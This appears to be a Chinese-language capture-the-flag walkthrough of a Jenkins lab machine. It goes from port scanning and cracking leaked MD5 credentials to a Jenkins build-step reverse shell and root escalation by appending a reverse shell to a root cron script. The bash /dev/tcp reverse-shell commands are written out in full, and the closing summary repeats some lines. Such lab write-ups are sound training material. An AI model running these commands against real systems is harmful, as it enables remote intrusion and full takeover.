![](https://img-blog.csdnimg.cn/img_convert/33e55ccd50d8ff22d8a3ec534e057634.jpeg)
nmap端口扫描
主机发现
![](https://img-blog.csdnimg.cn/img_convert/ad46948aa51a9f69b26df0dd5c1c8541.png)
创建文件夹进行保存扫描记录
指定最低1万速率扫描所有端口
![](https://img-blog.csdnimg.cn/img_convert/72cf6f4dbfc6efae4c5616108ad68ef0.png)
提取端口
![](https://img-blog.csdnimg.cn/img_convert/7d0778d266e6af925b454fac9497afac.png)
详细扫描
![](https://img-blog.csdnimg.cn/img_convert/27ef27fe559aa1afb1e6de3a54ebc5fc.png)
脚本扫描
![](https://img-blog.csdnimg.cn/img_convert/209b311d0262210956ed3f748c0a678f.png)
web渗透
![](https://img-blog.csdnimg.cn/img_convert/30b2d822a4dd93ce97cab5b11edf6dd9.png)
脚本扫描里有robots;去看一下
![](https://img-blog.csdnimg.cn/img_convert/c951e9ca0a996e04a8e906b22f7dcc20.png)
# we don't want robots to click "build" links
User-agent: *
Disallow: /
先目录爆破80端口
没有信息
![](https://img-blog.csdnimg.cn/img_convert/7e8dd58f65c61bede8a00c2d05389e90.png)
另一个扫描工具
也没有任何发现
![](https://img-blog.csdnimg.cn/img_convert/027c74766ce9d7c554797a153910d542.png)
点击网站;看有没有啥提示
我们再指定一下扩展名
![](https://img-blog.csdnimg.cn/img_convert/33e6fbf1fd6b00c5bc1158aac4100368.png)
可以看到access.html
老黑兄弟来帮忙提示了
以安全的方式加密的信用证!
![](https://img-blog.csdnimg.cn/img_convert/6a8ad79a8b7af3c62ca7854b20122ad4.png)
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
如果不知道编码方式可以使用hash-identifier来识别一下
就是md5
![](https://img-blog.csdnimg.cn/img_convert/fa40489bb12504ef4ab92699cc27255f.png)
解码
tiago:italia99
trindade:marianna
eder:vipsu
使用第三个账户密码登录成功
![](https://img-blog.csdnimg.cn/img_convert/559a3a6c94fd5e18fc0d4eec63f5e0cb.png)
我们应该是获得了更高的一个访问权限
Jenkins是一套著名内容管理系统;持续集成工具
了解不了解关系不大;但是我们需要懂得bug利用方式
简单点击查看管理系统功能
![](https://img-blog.csdnimg.cn/img_convert/8880802ed91b742fa5bca3242cfbbbb4.png)
获得初级系统权限
创建一个任务;填写名称;确定
第一个执行windows p 处理命令;因为扫描过程中,我们知道这个不是windows
第二个执行shell ;我们就用它
![](https://img-blog.csdnimg.cn/img_convert/89425c7c941f79918f7cfb13b589b17b.png)
这样我们写shell脚本
/bin/bash -i >& /dev/tcp/192.168.218.145/4444 0>&1
就需要我们在kali中开启监听4444端口
保存;理论上来说我们构建的反弹shell,点击立即构建就能够让kali收到一个反弹shell
![](https://img-blog.csdnimg.cn/img_convert/a00bbcb43963ba3f6d91a6f6857c8c67.png)
好,看kali中已经返回shell;同时上图也显示正在执行的任务
![](https://img-blog.csdnimg.cn/img_convert/9fb7e9984e253d2f7d32b21901ff4765.png)
crontab系统提权
正常查看下版本;用户;组;sudo -l权限; sudo提权没戏,那就看passwd
![](https://img-blog.csdnimg.cn/img_convert/e19d2e6217665cd9121f947c6eaebaa2.png)
查看下有哪些用户;目前我们的用户bash环境不太稳定,shadow无权查看
eder;root
我们就在其他提权路线做些尝试
![](https://img-blog.csdnimg.cn/img_convert/247ab0240ab1ef413a5a06f257698452.png)
先看一下系统有没有自动任务吧
一般是/etc/crontab;最下面有一条记录,应该是每五分钟以root权限执行
/etc/script/CleaningScript.sh
把他扔掉
少数也有cron.d
![](https://img-blog.csdnimg.cn/img_convert/dd577bea1a0ef828d5b4410d2df909de.png)
内容很简单,貌似是删除返回日志;反正这个文件是由root权限
![](https://img-blog.csdnimg.cn/img_convert/a92d0ad9479546fc9501a104f849167c.png)
将payload加入到root权限的文件夹里;先在kali中开启监听,因为我们不知道5分钟目前到哪了
echo "/bin/bash -i >& /dev/tcp/192.168.218.145/4443 0>&1" >> /etc/script/CleaningScript.sh
#因为我们看到root那边后缀有bash环境的,将payload追加到/etc/script/CleaningScript.sh
现在等待五分钟看能不能成功吧
![](https://img-blog.csdnimg.cn/img_convert/e53f8e32dfb0d33fc91ff496f63ef145.png)
总结
打靶正常的思路,先nmap扫,tcp、udp全扫一遍,防止漏掉信息
80优先思路、22ssh爆破放最后
普通扫目录无信息、根据网站信息猜测、再指定扫描测试
对编码进行hash-id识别、解码、利用信息尝试登录
要么是ssh登录、要么是8080的登录;进行尝试
进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell
权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限
写入poc;5分钟自动进入了root权限
这个靶机就被完全结束了
实战与靶场是不同的,靶场只是学习思路,有时写入我们还需要ls -laih查看有无写入权限等
进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell
权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限
写入poc;5分钟自动进入了root权限
这个靶机就被完全结束了
实战与靶场是不同的,靶场只是学习思路,有时写入我们还需要ls -laih查看有无写入权限等